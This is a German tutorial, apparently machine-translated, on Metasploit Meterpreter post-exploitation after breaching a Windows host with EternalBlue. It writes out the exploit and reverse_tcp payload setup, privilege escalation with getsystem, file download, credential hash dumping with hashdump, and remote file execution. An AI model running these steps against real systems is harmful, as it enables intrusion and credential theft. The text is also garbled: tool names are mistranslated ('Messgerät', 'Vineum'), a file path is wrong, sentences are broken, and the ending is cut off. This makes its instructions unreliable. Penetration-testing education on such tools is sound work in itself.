Nachausnutzung mit Messgerät

Nachausnutzung mit Messgerät
Dies ist eine Einführung in das Payload -Plugin des Messgeräts innerhalb von Metasploit. In diesem kurzen Tutorial diskutieren wir, wie Sie es verwenden können, um die Exploitation nach der Exploitation auf ein Windows OS -System anzuwenden, sobald Sie es bereits mit dem EternalBlue Exploit verletzt haben. Wir werden uns auf den Zugriff auf das Windows -System beschränken und es erkunden, und all die Dinge, die wir tun werden, werden sich auf den Zugriff auf Informationen und Benutzeranmeldeinformationen konzentrieren.

Einführung in Messgerät

Messgerät ist eine Angriffsnutzlast im Metasploit -Framework, mit dem der Täter durch eine Befehlsschale durch den Opfer des Opfers steuern und navigieren kann. Es kann sich als sehr vielseitiges Werkzeug bei Penetrationstests erweisen. Es handelt sich um ein Tool nach der Ausbeutung, das auf der Injektion von In-Memory-DLL basiert. Dies bedeutet, dass die injizierte DLL durch Erstellen eines neuen Vorgangs erstellt wird, bei dem das System auffordert, die injizierte DLL auszuführen. Sie können Zugriff auf eine unsichtbare Befehlsschale auf einer Opfermaschine erhalten, sodass Sie ausführbare und Profilnetzwerke ausführen können.

Es wurde ursprünglich für Metasploit 2 geschrieben.x und wird für Metasploit 3 aktualisiert.

Wir werden die Verwendungen von Messgerät im Detail diskutieren, aber davor haben wir ein Wort über Nutzlasten im Allgemeinen

Was sind Nutzlasten?

Nutzlasten in Metasploit sind Module, dh sie sind Snippets von Codes innerhalb von Metasploit, die auf dem Remote -System ausgeführt werden, das wir abzielen. Das Exploit -Modul wird zuerst gesendet, das das Nutzlastmodul auf dem System installiert. Dann gewährt die Nutzlast den Zugriff auf den Angreifer (eingeschränkt oder vollwertig, hängt vom Inhalt der Nutzlast ab). Um die Funktionsweise von Nutzlasten weiter auszuarbeiten, müssen wir seine Typen diskutieren, die insgesamt 3 sind:

Einzel

Diese Nutzlasten sind vollständig in sich geschlossen, was bedeutet, dass diese so grundlegend sein können wie Gatekeeper-Codes, die den Benutzer in ein Zielsystem ermöglichen.

Stager

Stager sind Nutzlasten, die Anwendungen innerhalb des Zielsystems sammeln und an den Angreifer senden. Es stellt die Verbindung zwischen dem Opfer zu unserer lokalen Maschine her.

Stufen

Sobald die Stager Zugriff auf das System haben, laden sie die Stufenmodule herunter. Stufenmodule entfernen die Größenkappe am Messgerät.

Beispiele für Stadien wären eine einfache Shell, iPhone 'IPWN' -Shell, Meterpreter -Module, VNC -Injektion.

Sie können die Art der Nutzlast erarbeiten, indem Sie seinen Namen ermitteln. Einzelne Nutzlasten sind normalerweise vom Format /

Ausbeutung mit Messgerät

Starten Sie zunächst die MSF -Konsole, indem Sie den folgenden Terminalbefehl im Kali -Terminalfenster eingeben.

$ sudo msfconsole

Wir verwenden Reverse_tcp als Stager und Meterpreter als Bühne.

Wir werden zunächst den ewigen blauen Exploit aufstellen. Select (ms17_010_eternalBlue) Setzen

Konfigurieren Sie als Nächstes die Exploit -Einstellungen und führen Sie den Befehl Exploit mit Exploit -Befehl aus:

$ Setzen Sie Payload Windows/X64/MeterPreter/Reverse_tcp
$ set Rhost 192.168.198.136
$ exploit

Der Eternalblue Exploit wurde erfolgreich aktiviert.

Nachausnutzung

Wir zugreifen und manipulieren Sie das bereits kompromittierte System während der Nachaussetzung.

Wir können jetzt viele Dinge tun, da wir Zugriff auf das System haben, aber wie oben erwähnt, müssen wir uns hauptsächlich auf das Herunterladen von Informationen und den Erhalt von Benutzeranmeldeinformationen konzentrieren

Verwalten des Zugriffs Privilegien:

Abhängig vom Nutzlastmodul und dem von Ihnen verwendeten Ausbeutung werden Sie möglicherweise mit bestimmten Zugriffsbeschränkungen konfrontiert, die Ihre Fähigkeiten, die Opfermaschine zu manövrieren. Sie können dieses Problem mit der Eskalation mit Privilegien umgehen, indem Sie Passwörter löschen und die Registrierung manipulieren. Sie können auch die Berechtigungen mit dem Get System -Command von Meterpreter eskalieren.

$ getSystem
$ Getuid

Dateiübertragung mit Messgerät

Mit Messgerät können Sie eine Datei mit dem Befehl $ download herunterladen.

$ Download/Windows/System32/Treiber/etc/hosts

In ähnlicher Weise können Sie Informationen auch mit $ Upload-Befehl auf den Computer hochladen

Extrahieren von Benutzeranmeldeinformationen:

Verwenden Sie Codes -Skript -Anmeldeinformationen_Collector, um Benutzerkonteninformationen zu extrahieren, oder verwenden Sie das Hash -Dump -Postmodul zu einem ähnlichen Effekt.

Wir werden das Hash -Dump -Postmodul verwenden, um mit der Ernte der Anmeldeinformationen fortzufahren. Geben Sie den folgenden MSF -Befehl ein.

$ Run Post/Windows/Gather/Hashdump

Wie wir sehen können, haben wir die Coen-, Gast- und Administratorkonten erhalten. Der LM -Hash (Administrator) und der NTLM (Gast) Hash beziehen sich auf leere Passwörter, während der Coen -Hash ein Passwort ist, das Sie zum Knacken benötigen. Sie können dies mit einem Passwortcracker verwenden.

Automatisierung des Systems

Es kann mühsam sein, Informationen mit individuellen Eingabeberechnungen zu sammeln, mit denen Sie die Befehlsschale weiter füttern müssen. Praktischerweise können Sie diesen Vorgang mit Vineum-Skript etwas automatisieren. Das Skript sammelt Informationen vom Opfer und lädt die Daten in unsere lokale Maschine herunter. Sie werden mitgeteilt, wo die Ausgabe gespeichert wird, wie Sie in der vierten Zeile von oben sehen können:

$ Run Wineum

Denken Sie daran, dass der Weg, in dem die Ausgabe jedes Befehls gespeichert ist.

Lass uns ein bisschen mehr herumspielen

Dateien ausführen

Sie können jede Datei auf dem System ausführen, indem Sie Folgendes verwenden: -f . Dies umfasst sowohl ausführbare Dateien als auch Programme mit mehreren unterstützenden Dateien. Um beispielsweise die integrierte Taschenrechner -App im Windows -Betriebssystem auszuführen.exe

Screenshots machen

Sie können auch Screenshots aus der Sicht des Benutzers erfassen. Geben Sie einfach Screenshot in die Befehlsschale des Messgeräts ein, und Sie erhalten einen Screenshot des Displays auf dem System.

$ execute -f calc.exe
$ screenshot

Abschluss:

Dies war eine kurz. Wir haben hier erfahren, wie wir ein Windows OS-System mit Eternalblue-Exploit verletzen können, um Zugriff zu erhalten, und dann mit dem Messgerät die Berechtigung zu eskalieren, Informationen manuell zu sammeln und durch den Automatisieren von Vineus-Befehl. Wir haben auch gelernt, wie man Dateien auf dem Opfergerät ausführt.

Messgerät kann als nennenswerte Mittel zur Anfälligkeitserkennung dienen, obwohl es sich.